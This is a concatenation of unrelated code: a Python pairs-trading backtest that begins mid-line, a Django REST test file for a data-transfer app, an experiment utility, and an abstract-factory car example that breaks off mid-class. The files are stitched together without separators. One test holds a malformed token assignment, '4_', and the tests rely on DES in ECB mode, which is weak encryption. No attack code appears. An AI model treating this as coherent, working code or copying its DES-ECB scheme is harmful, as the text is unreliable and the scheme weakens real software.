matplotlib.pyplot as plt def mean(lst): return sum(lst) / len(lst) def stan_dev(lst): return statistics.pstdev(lst) def z_score(val1, val2, lst): ratio = val1 / val2 return (ratio - mean(lst)) / (stan_dev(lst)) def get_moving_average(ratio_lst, window_size): ratio = pd.DataFrame(ratio_lst) moving_average = ratio.rolling(window=window_size).mean() moving_average_lst = moving_average.values.tolist() return moving_average, moving_average_lst def bollinger_bands(ratio_lst, window_size, num_sd=1.4): ratio = pd.DataFrame(ratio_lst) moving_average, moving_average_lst = get_moving_average(ratio_lst, window_size) moving_sd = ratio.rolling(window=window_size).std() moving_sd_lst = moving_sd.values.tolist() upper_band = (moving_average + (moving_sd * num_sd)).values.tolist() lower_band = (moving_average - (moving_sd * num_sd)).values.tolist() return moving_average_lst, moving_sd_lst, upper_band, lower_band def moving_z_score(moving_average_short_lst, moving_average_lst, moving_sd_lst, index): return (moving_average_short_lst[index][0] - moving_average_lst[index][0]) / (moving_sd_lst[index][0]) def trade_moving(ratio, stock1, stock2, index, window_size=20, short_window_size=5): case = 0 multiplier = 1 moving_average, moving_sd, upper_band, lower_band = bollinger_bands(ratio, window_size) moving_average_short, moving_average_short_lst = get_moving_average(ratio, short_window_size) if (moving_average_short_lst[index][0] < lower_band[index][0]): case = 2 multiplier = -1 * moving_z_score(moving_average_short_lst, moving_average, moving_sd, index) elif (moving_average_short_lst[index][0] > upper_band[index][0]): case = 1 multiplier = moving_z_score(moving_average_short_lst, moving_average, moving_sd, index) return case, multiplier def trade_simple(ratio, stock1, stock2, index): cur_score = z_score(stock1[index], stock2[index], ratio) case = 0 if (cur_score > 1): case = 1 if (cur_score < -1): case = 2 cur_score = max(cur_score, -1 * cur_score) return case, cur_score def testing(start,ratio, stock1, stock2, model, starting_amount, const): # const should be >5 portfolio_value = starting_amount stock1_owned = 0 stock2_owned = 0 case = 0 cur_score = 0 buy_time = [] buy_price = [] sell_time = [] sell_price = [] for i in range(start, len(ratio)): print(portfolio_value) if (model == 1): # simple case, cur_score = trade_simple(ratio, stock1, stock2, i) else: case, cur_score = trade_moving(ratio, stock1, stock2, i) if (case == 1): sell_time.append(i) sell_price.append(stock1[i]) amount_sold = min(stock1_owned, (portfolio_value * cur_score)/(stock1[i] * const)) stock1_owned -= amount_sold portfolio_value += amount_sold * stock1[i] buy_time.append(i) buy_price.append(stock2[i]) amount_bought = min((portfolio_value * cur_score)/(stock2[i] * const), portfolio_value/stock2[i]) stock2_owned += amount_bought portfolio_value -= amount_bought * stock2[i] elif (case == 2): sell_time.append(i) sell_price.append(stock2[i]) amount_sold = min(stock2_owned, (portfolio_value * cur_score)/(stock2[i] * const)) stock2_owned -= amount_sold portfolio_value += amount_sold * stock2[i] buy_time.append(i) buy_price.append(stock1[i]) amount_bought = min((portfolio_value * cur_score)/(stock1[i] * const), portfolio_value/stock1[i]) stock1_owned += amount_bought portfolio_value -= amount_bought * stock1[i] portfolio_value += stock1_owned * stock1[len(ratio) - 1] + stock2_owned * stock2[len(ratio) - 1] print(portfolio_value) print(stock1_owned) print(stock2_owned) plt.plot(stock1) plt.plot(stock2) plt.scatter(buy_time,buy_price, marker= 6,color ='green') plt.scatter(sell_time, sell_price, marker =7, color = 'red') plt.show() if (model == 2): moving_average_lst, moving_sd_lst, upper_band, lower_band = bollinger_bands(ratio,20) plt.plot(upper_band) plt.plot(lower_band) plt.plot(ratio) plt.show() def main(): start_pointer = 2 end_pointer = 1393 stock_series = cointegration.get_data(start_pointer, end_pointer) tickers, pairs, p_values, coint_sec = cointegration.perform_coint(start_pointer, end_pointer) stock1 = stock_series[pairs[1][0]].tolist() stock2 = stock_series[pairs[1][1]].tolist() ratio = np.divide(stock_series[pairs[1][0]].tolist(), stock_series[pairs[1][1]].tolist()) # testing_moving(ratio, stock1, stock2, 1) testing(639, ratio, stock1, stock2, 2, 100000, 10) main()transfer_app/tests.py import sys from Crypto.Cipher import DES import base64 from django.test import TestCase import unittest.mock as mock from rest_framework.test import APIClient from rest_framework import status from django.urls import reverse from django.contrib.auth import get_user_model from django.conf import settings from django.core.exceptions import ObjectDoesNotExist from base.models import Resource from transfer_app.models import Transfer, TransferCoordinator, FailedTransfer # a method for creating a reasonable test dataset: def create_data(testcase_obj): # create two users-- one is admin, other is regular testcase_obj.regular_user = get_user_model().objects.create_user(email=settings.REGULAR_TEST_EMAIL, password='!') testcase_obj.admin_user = get_user_model().objects.create_user(email=settings.ADMIN_TEST_EMAIL, password='!', is_staff=True) testcase_obj.other_user = get_user_model().objects.create_user(email=settings.OTHER_TEST_EMAIL, password='!') # create a couple of Resources owned by admin: r1 = Resource.objects.create( source = 'google_bucket', path='gs://a/b/admin_owned1.txt', size=500, owner=testcase_obj.admin_user, ) r2 = Resource.objects.create( source='google_storage', path='in some user dropbox1', size=500, owner=testcase_obj.admin_user, ) # create a couple of resources owned by the regular user: r3 = Resource.objects.create( source='google_storage', path='gs://a/b/reg_owned1.txt', size=500, owner=testcase_obj.regular_user, ) r4 = Resource.objects.create( source='google_storage', path='gs://a/b/reg_owned2.txt', size=500, owner=testcase_obj.regular_user, ) r5 = Resource.objects.create( source='google_storage', path='in some user dropbox2', size=500, owner=testcase_obj.regular_user, ) # create a batch of Transfers: tc1 = TransferCoordinator.objects.create() tc2 = TransferCoordinator.objects.create() tc3 = TransferCoordinator.objects.create() tc4 = TransferCoordinator.objects.create() # create Transfer instances for the Resources above # An admin-owned download transfer t1 = Transfer.objects.create( download=True, resource = r1, destination = 'dropbox', coordinator = tc1, originator = testcase_obj.admin_user ) # Create two downloads and one upload owned by a regular user: t2 = Transfer.objects.create( download=True, resource = r3, destination = 'dropbox', coordinator = tc2, originator = testcase_obj.regular_user ) t3 = Transfer.objects.create( download=True, resource = r4, destination = 'dropbox', coordinator = tc2, originator = testcase_obj.regular_user ) t4 = Transfer.objects.create( download=False, resource = r5, destination = 'our system', coordinator = tc3, originator = testcase_obj.regular_user ) # now create a Transfer that was originated by an admin, but the Resource is owned by # a regular user t5 = Transfer.objects.create( download=False, resource = r5, destination = 'our system', coordinator = tc4, originator = testcase_obj.admin_user ) ''' Tests for listing Transfers: - lists all Transfers if requested by admin - If non-admin request, lists only those owned by that user ''' class TransferListTestCase(TestCase): def setUp(self): create_data(self) def test_list_all_transfers_for_admin(self): ''' This tests that the admin can list all existing Transfers ''' t = Transfer.objects.all() admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-list') response = admin_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 5) def test_nonadmin_list_returns_only_owned_transfers(self): ''' This tests that a regular user can only list the Transfer objects they originated. Note that this does NOT list the Transfers that happened for Resources they owned. ''' reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) user_transfers = Transfer.objects.user_transfers(reg_user) reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-list') response = reg_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 3) def test_list_download_transfers_for_admin(self): ''' This tests that the admin can list all the downloads, regardless of user ''' t = Transfer.objects.all() admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-list') url = '%s?download=true' % url response = admin_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 3) def test_list_upload_transfers_for_admin(self): ''' This tests that the admin can list all the uploads, regardless of user ''' t = Transfer.objects.all() admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-list') url = '%s?download=false' % url response = admin_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 2) def test_list_download_transfers_for_reguser(self): ''' This tests that the regular user can list all their downloads ''' t = Transfer.objects.all() reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-list') url = '%s?download=true' % url response = reg_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 2) def test_list_upload_transfers_for_reguser(self): ''' This tests that the regular user can list all their uploads Note that there were multiple uploads of this user's files. However, only one of those was originated by this regular user; the other was transferred by an admin ''' t = Transfer.objects.all() reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-list') url = '%s?download=false' % url response = reg_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 1) ''' Test for retrieving a specific Transfer: - returns 404 if the pk does not exist regardless of user - returns 404 if a non-admin user requests a Transfer owned by someone else - returns correctly if admin requests Transfer owned by someone else - returns correctly if admin requests Transfer owned by themself ''' class TransferDetailTestCase(TestCase): def setUp(self): create_data(self) def test_return_404_for_missing_transfer(self): admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[666,]) # some non-existant pk response = admin_client.get(url) self.assertEqual(response.status_code,404) reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[666,]) # some non-existant pk response = reg_client.get(url) self.assertEqual(response.status_code,404) def test_admin_user_can_query_own_transfer(self): admin_user = get_user_model().objects.get(email=settings.ADMIN_TEST_EMAIL) t = Transfer.objects.user_transfers(admin_user) instance = t[0] admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[instance.pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 200) # check that the Resource 'wrapped' by the Transfer is in fact # owned by the admin: data = response.data resource_pk = data['resource'] r = Resource.objects.get(pk=resource_pk) owner = r.get_owner() self.assertEqual(owner, admin_user) def test_admin_user_can_query_others_transfer(self): # get an instance of a regular user's Transfer reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) t = Transfer.objects.user_transfers(reg_user) instance = t[0] # create admin client: admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[instance.pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 200) # check that the Resource 'wrapped' by the Transfer is in fact # owned by the other/regular user: data = response.data resource_pk = data['resource'] r = Resource.objects.get(pk=resource_pk) owner = r.get_owner() self.assertEqual(owner, reg_user) def test_regular_user_can_query_own_transfer(self): # get an instance of a regular user's Transfer reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) t = Transfer.objects.user_transfers(reg_user) instance = t[0] # create regular client: reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[instance.pk,]) response = reg_client.get(url) self.assertEqual(response.status_code, 200) # check that the Resource 'wrapped' by the Transfer is in fact # owned by the other/regular user: data = response.data resource_pk = data['resource'] r = Resource.objects.get(pk=resource_pk) owner = r.get_owner() self.assertEqual(owner, reg_user) def test_regular_user_cannot_query_others_transfer(self): # get an instance of another user's Transfer (here, the admins) admin_user = get_user_model().objects.get(email=settings.ADMIN_TEST_EMAIL) t = Transfer.objects.user_transfers(admin_user) instance = t[0] # create regular client: reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[instance.pk,]) response = reg_client.get(url) self.assertEqual(response.status_code, 404) ''' Tests for UserTransferList: - non-admin receives 403 - using a pk (of a user) that does not exist returns a 404 - properly returns a list of Transfers for a particular owner ''' class UserTransferListTestCase(TestCase): def setUp(self): create_data(self) def test_404_from_nonexistent_user_for_user_transfer_list(self): # query all existing users, get the max pk, then add 1 # to guarantee a non-existent user's pk all_users = get_user_model().objects.all() all_user_pks = [x.pk for x in all_users] max_pk = max(all_user_pks) nonexistent_user_pk = max_pk + 1 admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('user-transfer-list', args=[nonexistent_user_pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 404) def test_non_admin_user_gets_403_for_user_specific_transfer_list(self): ''' regular users cannot access the /resources/user// endpoint which lists the resources belonging to a specific user. That functionality is already handled by a request to the /resources/ endpoint ''' client = APIClient() client.login(email=settings.REGULAR_TEST_EMAIL, password='!') # get the regular user's pk: u = get_user_model().objects.filter(email=settings.REGULAR_TEST_EMAIL)[0] reguser_pk = u.pk url = reverse('user-transfer-list', args=[reguser_pk]) response = client.get(url) self.assertEqual(response.status_code,403) def test_admin_user_correctly_can_get_user_specific_transfer_list(self): # establish the admin client: client = APIClient() client.login(email=settings.ADMIN_TEST_EMAIL, password='!') # get the regular user's pk: u = get_user_model().objects.filter(email=settings.REGULAR_TEST_EMAIL)[0] reguser_pk = u.pk url = reverse('user-transfer-list', args=[reguser_pk]) response = client.get(url) data = response.data self.assertEqual(response.status_code,200) self.assertEqual(len(response.data), 3) owner_status = [] for item in data: resource_pk = item['resource'] resource_obj = Resource.objects.get(pk=resource_pk) owner_status.append(resource_obj.owner == u) self.assertTrue(all(owner_status)) ''' Tests for batch list (TransferCoordinator): - lists all TransferCoordinators if requested by admin - If non-admin request, lists only TransferCoordinator objects owned by that user ''' class TransferCoordinatorListTestCase(TestCase): def setUp(self): create_data(self) def test_list_all_transfercoordinators_for_admin(self): admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('batch-list') response = admin_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 4) def test_nonadmin_list_returns_only_owned_transfers(self): reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) user_tc = TransferCoordinator.objects.user_transfer_coordinators(reg_user) user_tc_pk = set([x.pk for x in user_tc]) # the primary keys of the reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('batch-list') response = reg_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 2) data = response.data result_set = set() for item in data: result_set.add(item['id']) self.assertTrue(user_tc_pk == result_set) def test_unauthenticated_user_gets_403_for_transfercoordinator_list(self): client = APIClient() url = reverse('batch-list') response = client.get(url) self.assertEqual(response.status_code, 403) ''' Tests for batch detail (TransferCoordinator): - returns 404 if the pk does not exist regardless of requesting user - returns 404 if a non-admin user requests a TransferCoordinator owned by someone else - returns correctly if admin requests TransferCoordinator owned by someone else - returns correctly if admin requests TransferCoordinator owned by themself ''' class TransferCoordinatorDetailTestCase(TestCase): def setUp(self): create_data(self) def test_return_404_for_missing_tc(self): admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[666,]) # some non-existant pk response = admin_client.get(url) self.assertEqual(response.status_code,404) reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[666,]) # some non-existant pk response = reg_client.get(url) self.assertEqual(response.status_code,404) def test_admin_user_can_query_own_tc(self): admin_user = get_user_model().objects.get(email=settings.ADMIN_TEST_EMAIL) t = TransferCoordinator.objects.user_transfer_coordinators(admin_user) instance = t[0] admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[instance.pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 200) # check that the Resource 'wrapped' by the TransferCoordinator is in fact # owned by the admin: data = response.data tc_pk = data['id'] transfers = Transfer.objects.filter(coordinator__pk = tc_pk) owners = list(set([t.resource.owner for t in transfers])) self.assertTrue(len(owners) == 1) self.assertTrue(owners[0] == admin_user) def test_admin_user_can_query_others_tc(self): # get an instance of a regular user's TransferCoordinator reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) t = TransferCoordinator.objects.user_transfer_coordinators(reg_user) instance = t[0] # create admin client: admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[instance.pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 200) # check that the TransferCoordinator is in fact # owned by the regular user: data = response.data tc_pk = data['id'] tc = TransferCoordinator.objects.get(pk=tc_pk) transfers_for_this_tc = Transfer.objects.filter(coordinator=tc) owners = list(set([x.resource.owner for x in transfers_for_this_tc])) self.assertEqual(len(owners), 1) self.assertEqual(owners[0], reg_user) def test_regular_user_can_query_own_tc(self): # get an instance of a regular user's TransferCoordinator reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) t = TransferCoordinator.objects.user_transfer_coordinators(reg_user) instance = t[0] # create regular client: reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[instance.pk,]) response = reg_client.get(url) self.assertEqual(response.status_code, 200) # check that the TransferCoordinator is in fact # owned by the other/regular user: data = response.data tc_pk = data['id'] transfers = Transfer.objects.filter(coordinator__pk = tc_pk) owners = list(set([t.resource.owner for t in transfers])) self.assertTrue(len(owners) == 1) self.assertTrue(owners[0] == reg_user) def test_regular_user_cannot_query_others_tc(self): # get an instance of another user's TransferCoordinator (here, the admins) admin_user = get_user_model().objects.get(email=settings.ADMIN_TEST_EMAIL) t = TransferCoordinator.objects.user_transfer_coordinators(admin_user) instance = t[0] # create regular client: reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[instance.pk,]) response = reg_client.get(url) self.assertEqual(response.status_code, 404) ''' Tests for UserBatchList (TransferCoordinator): - non-admin receives 403 - using a pk that does not exist returns a 404 - properly returns a list of TransferCoordinators for a particular owner ''' class TransferCoordinatorUserListCase(TestCase): def setUp(self): create_data(self) def test_404_from_nonexistent_user_for_user_tc_list(self): # query all existing users, get the max pk, then add 1 # to guarantee a non-existent user's pk all_users = get_user_model().objects.all() all_user_pks = [x.pk for x in all_users] max_pk = max(all_user_pks) nonexistent_user_pk = max_pk + 1 admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('user-batch-list', args=[nonexistent_user_pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 404) def test_non_admin_user_gets_403_for_user_specific_tc_list(self): ''' regular users cannot access the /resources/user// endpoint which lists the resources belonging to a specific user. That functionality is already handled by a request to the /resources/ endpoint ''' client = APIClient() client.login(email=settings.REGULAR_TEST_EMAIL, password='!') # get the regular user's pk: u = get_user_model().objects.filter(email=settings.REGULAR_TEST_EMAIL)[0] reguser_pk = u.pk url = reverse('user-batch-list', args=[reguser_pk]) response = client.get(url) self.assertEqual(response.status_code,403) def test_admin_user_correctly_can_get_user_specific_tc_list(self): # establish the admin client: client = APIClient() client.login(email=settings.ADMIN_TEST_EMAIL, password='!') # get the regular user's pk: u = get_user_model().objects.filter(email=settings.REGULAR_TEST_EMAIL)[0] reguser_pk = u.pk url = reverse('user-batch-list', args=[reguser_pk]) response = client.get(url) data = response.data self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 2) # check that the TransferCoordinators returned are all properly owned by reg_user owner_list = [] for item in data: tc_pk = item['id'] transfers = Transfer.objects.filter(coordinator__pk = tc_pk) owners = [t.resource.owner for t in transfers] owner_list.extend(owners) owner_list = list(set(owner_list)) self.assertTrue(len(owner_list) == 1) self.assertTrue(owner_list[0] == u) ''' Tests for completion marking: - unauthenticated requests are rejected - marks the particular transfer complete - if not the final transfer, TransferCoordinator stays 'incomplete' - if it is the final transfer, TransferCoordinator marked complete ''' class CompletionMarkingTestCase(TestCase): def setUp(self): self.regular_user = get_user_model().objects.create_user(email=settings.REGULAR_TEST_EMAIL, password='!') # create a couple of resources owned by the regular user: self.r1 = Resource.objects.create( source='google_storage', path='gs://a/b/reg_owned1.txt', size=500, owner=self.regular_user, ) self.r2 = Resource.objects.create( source='google_storage', path='gs://a/b/reg_owned2.txt', size=500, owner=self.regular_user, ) self.tc1 = TransferCoordinator.objects.create() self.t1 = Transfer.objects.create( download=True, resource = self.r1, destination = 'dropbox', coordinator = self.tc1, originator = self.regular_user ) self.t2 = Transfer.objects.create( download=True, resource = self.r2, destination = 'dropbox', coordinator = self.tc1, originator = self.regular_user ) # create a couple of resources owned by the regular user representing # uploaded objects self.r3 = Resource.objects.create( source='dropbox', path='gs://a/b/reg_owned3.txt', size=500, owner=self.regular_user, is_active = False ) self.r4 = Resource.objects.create( source='dropbox', path='gs://a/b/reg_owned4.txt', size=500, owner=self.regular_user, is_active = False ) self.tc2 = TransferCoordinator.objects.create() self.t3 = Transfer.objects.create( download=False, resource = self.r3, destination = 'gs://a/b/reg_owned3.txt', coordinator = self.tc2, originator = self.regular_user ) self.t4 = Transfer.objects.create( download=False, resource = self.r4, destination = 'gs://a/b/reg_owned4.txt', coordinator = self.tc2, originator = self.regular_user ) self.tc3 = TransferCoordinator.objects.create() self.t5 = Transfer.objects.create( download=False, resource = self.r3, destination = 'gs://a/b/reg_owned3.txt', coordinator = self.tc3, originator = self.regular_user) def test_single_worker_completion_signal(self): ''' This tests where one of many workers has completed. Not ALL have completed, so the TransferCoordinator stays incomplete ''' # query the database and get the TransferCoordinator and its Transfer instances: tc_pk = self.tc1.pk tc = TransferCoordinator.objects.get(pk=tc_pk) transfers = Transfer.objects.filter(coordinator = tc) d = {} token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) d['token'] = b64_str d['transfer_pk'] = self.t1.pk d['coordinator_pk'] = tc_pk d['success'] = True client = APIClient() url = reverse('transfer-complete') response = client.post(url, d, format='json') self.assertEqual(response.status_code, 200) # query database to see that the Transfer was marked complete, but the # coordinator is still incomplete t = Transfer.objects.get(pk=self.t1.pk) self.assertTrue(t.completed) tc = TransferCoordinator.objects.get(pk=tc_pk) self.assertEqual(tc.completed, False) @mock.patch('transfer_app.views.utils') def test_full_completion_signal(self, mock_utils): ''' This tests where both of two workers have completed. ALL have completed, so the TransferCoordinator becomes complete ''' mock_utils.post_completion = mock.MagicMock() # query the database and get the TransferCoordinator and its Transfer instances: tc_pk = self.tc1.pk tc = TransferCoordinator.objects.get(pk=tc_pk) transfers = Transfer.objects.filter(coordinator = tc) token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) d1 = {} d1['token'] = b64_str d1['transfer_pk'] = self.t1.pk d1['coordinator_pk'] = tc_pk d1['success'] = True d2 = {} d2['token'] = b64_str d2['transfer_pk'] = self.t2.pk d2['coordinator_pk'] = tc_pk d2['success'] = True client = APIClient() url = reverse('transfer-complete') response1 = client.post(url, d1, format='json') self.assertEqual(response1.status_code, 200) response2 = client.post(url, d2, format='json') self.assertEqual(response2.status_code, 200) # query database to see that the Transfer was marked complete t1 = Transfer.objects.get(pk=self.t1.pk) self.assertTrue(t1.completed) t2 = Transfer.objects.get(pk=self.t2.pk) self.assertTrue(t2.completed) tc = TransferCoordinator.objects.get(pk=tc_pk) self.assertTrue(tc.completed) @mock.patch('transfer_app.views.utils') def test_failed_transfer_cleans_up_resource(self, mock_utils): ''' This tests where both of two workers have completed. One has failed. We test that the Resource object corresponding to the failed transfer is removed and that we log the failed transfer in the database. ALL transfers have completed, so the TransferCoordinator becomes complete also ''' mock_utils.post_completion = mock.MagicMock() # query the database and get the TransferCoordinator tc_pk = self.tc2.pk tc = TransferCoordinator.objects.get(pk=tc_pk) # check that we do not have any failedtransfers so far: ft = FailedTransfer.objects.all() self.assertTrue(len(ft) == 0) # get the primary key for the Resource which will fail to transfer: failed_resource = self.r3 failed_resource_pk = failed_resource.pk failed_resource_path = failed_resource.path token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) # make the first Transfer fail d1 = {} d1['token'] = b64_str d1['transfer_pk'] = self.t3.pk d1['coordinator_pk'] = tc_pk d1['success'] = False # this transfer was a success: d2 = {} d2['token'] = b64_str d2['transfer_pk'] = self.t4.pk d2['coordinator_pk'] = tc_pk d2['success'] = True # mock the worker machines communicating back: client = APIClient() url = reverse('transfer-complete') response1 = client.post(url, d1, format='json') self.assertEqual(response1.status_code, 200) response2 = client.post(url, d2, format='json') self.assertEqual(response2.status_code, 200) # query database to see that the second Transfer was marked complete t = Transfer.objects.get(pk=self.t4.pk) self.assertTrue(t.completed) # check that the resource was marked active since it succeeded: r_pk = self.t4.resource.pk r = Resource.objects.get(pk=r_pk) self.assertTrue(r.is_active) # check that we added a FailedTransfer to the database: ft = FailedTransfer.objects.all() self.assertTrue(len(ft) == 1) ft = ft[0] self.assertEqual(ft.intended_path, failed_resource_path) # check that the failed transfer led to the resource # being removed with self.assertRaises(ObjectDoesNotExist): r = Resource.objects.get(pk=failed_resource_pk) # check that the TransferCoordinator was marked complete. tc = TransferCoordinator.objects.get(pk=tc_pk) self.assertTrue(tc.completed) @mock.patch('transfer_app.views.utils') def test_single_failed_transfer_cleans_up_resource(self, mock_utils): ''' This tests where a single transfer has failed. We test that the Resource object corresponding to the failed transfer is removed and that we log the failed transfer in the database. ALL transfers have completed, so the TransferCoordinator becomes complete also ''' mock_utils.post_completion = mock.MagicMock() # query the database and get the TransferCoordinator tc_pk = self.tc3.pk tc = TransferCoordinator.objects.get(pk=tc_pk) # check that we do not have any failedtransfers so far: ft = FailedTransfer.objects.all() self.assertTrue(len(ft) == 0) # get the primary key for the Resource which will fail to transfer: failed_resource = self.r3 failed_resource_pk = failed_resource.pk failed_resource_path = failed_resource.path token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) # make the first Transfer fail d1 = {} d1['token'] = b64_str d1['transfer_pk'] = self.t5.pk d1['coordinator_pk'] = tc_pk d1['success'] = False # mock the worker machines communicating back: client = APIClient() url = reverse('transfer-complete') response1 = client.post(url, d1, format='json') self.assertEqual(response1.status_code, 200) # check that we added a FailedTransfer to the database: ft = FailedTransfer.objects.all() self.assertTrue(len(ft) == 1) ft = ft[0] self.assertEqual(ft.intended_path, failed_resource_path) # check that the failed transfer led to the resource # being removed with self.assertRaises(ObjectDoesNotExist): r = Resource.objects.get(pk=failed_resource_pk) # check that the TransferCoordinator was marked complete. tc = TransferCoordinator.objects.get(pk=tc_pk) self.assertTrue(tc.completed) a_t = all_transfers = Transfer.objects.filter(coordinator = tc) print(a_t) for x in a_t: print('here is x: %s' % x) self.assertTrue(mock_utils.post_completion.called) def test_completion_signal_with_wrong_token_is_rejected(self): ''' This tests where a bad token is sent. Should reject with 404 ''' # query the database and get the TransferCoordinator and its Transfer instances: tc = TransferCoordinator.objects.get(pk=self.tc1.pk) transfers = Transfer.objects.filter(coordinator = tc) bad_token = '' obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(bad_token) bad_b64_str = base64.encodestring(enc_token) d1 = {} d1['token'] = 4_ d1['transfer_pk'] = 1 d1['coordinator_pk'] = 1 d1['success'] = True client = APIClient() url = reverse('transfer-complete') response1 = client.post(url, d1, format='json') self.assertEqual(response1.status_code, 404) def test_incorrect_transfer_pk_on_completion(self): ''' This tests where an incorrect pk is given for the transfer ''' # query the database and get the TransferCoordinator and its Transfer instances: tc = TransferCoordinator.objects.get(pk=self.tc1.pk) transfers = Transfer.objects.filter(coordinator = tc) d = {} token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) d['token'] = b64_str d['transfer_pk'] = 100 # an invalid pk d['success'] = True client = APIClient() url = reverse('transfer-complete') response = client.post(url, d, format='json') self.assertEqual(response.status_code, 400) def test_bad_payload_on_completion(self): ''' This tests where required info is missing in the request ''' # query the database and get the TransferCoordinator and its Transfer instances: tc = TransferCoordinator.objects.get(pk=self.tc1.pk) transfers = Transfer.objects.filter(coordinator = tc) d = {} token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) d['token'] = b64_str # note: missing the transfer_pk key d['success'] = True client = APIClient() url = reverse('transfer-complete') response = client.post(url, d, format='json') self.assertEqual(response.status_code, 400) @mock.patch('transfer_app.utils.send_email') def test_post_completion_with_only_failures(self, mock_email_send): ''' If none of the transfers are successful, test that the correct behavior happens ''' from transfer_app.utils import post_completion # this coord does not have any Transfer objects associated with it. empty_coordinator = TransferCoordinator.objects.create() post_completion(empty_coordinator, [settings.REGULAR_TEST_EMAIL,]) self.assertTrue(mock_email_send.called) examples/tqt/shiftadder/utils.py1-10 import os, shutil def create_exp_dir(path, scripts_to_save=None): if not os.path.exists(path): os.mkdir(path) print('Experiment dir : {}'.format(path)) if scripts_to_save is not None: os.mkdir(os.path.join(path, 'scripts')) for script in scripts_to_save: dst_file = os.path.join(path, 'scripts', os.path.basename(script)) shutil.copyfile(script, dst_file) def exp_record(note, args_to_save, save_path): f = open(note, 'a') f.write('%s\t%s\n' % (save_path, args_to_save)) f.close() """ Creational: abstract factory Car => Benz, Bmw => Suv, Coupe benz suv => gla, glc bmw suv => x1, x2 benz coupe => cls, E-class bmw coupe => m2, m4 """ from abc import ABC, abstractmethod class Car(ABC): @abstractmethod def call_suv(self): pass @abstractmethod def call_coupe(self): pass # ------------------------------------------------------------- class Benz(Car): def call_suv(self): return Gla() def call_coupe(self): return Cls() # ------------------------------------------------------------- class Bmw(Car): def call_suv(self): return X1() def call_coupe(self): return M2() # ------------------------------------------------------------- class Suv(ABC): @abstractmethod def creating_suv(self): pass class Coupe(ABC): @abstractmethod def creating_coupe(self): pass # ------------------------------------------------------------- class 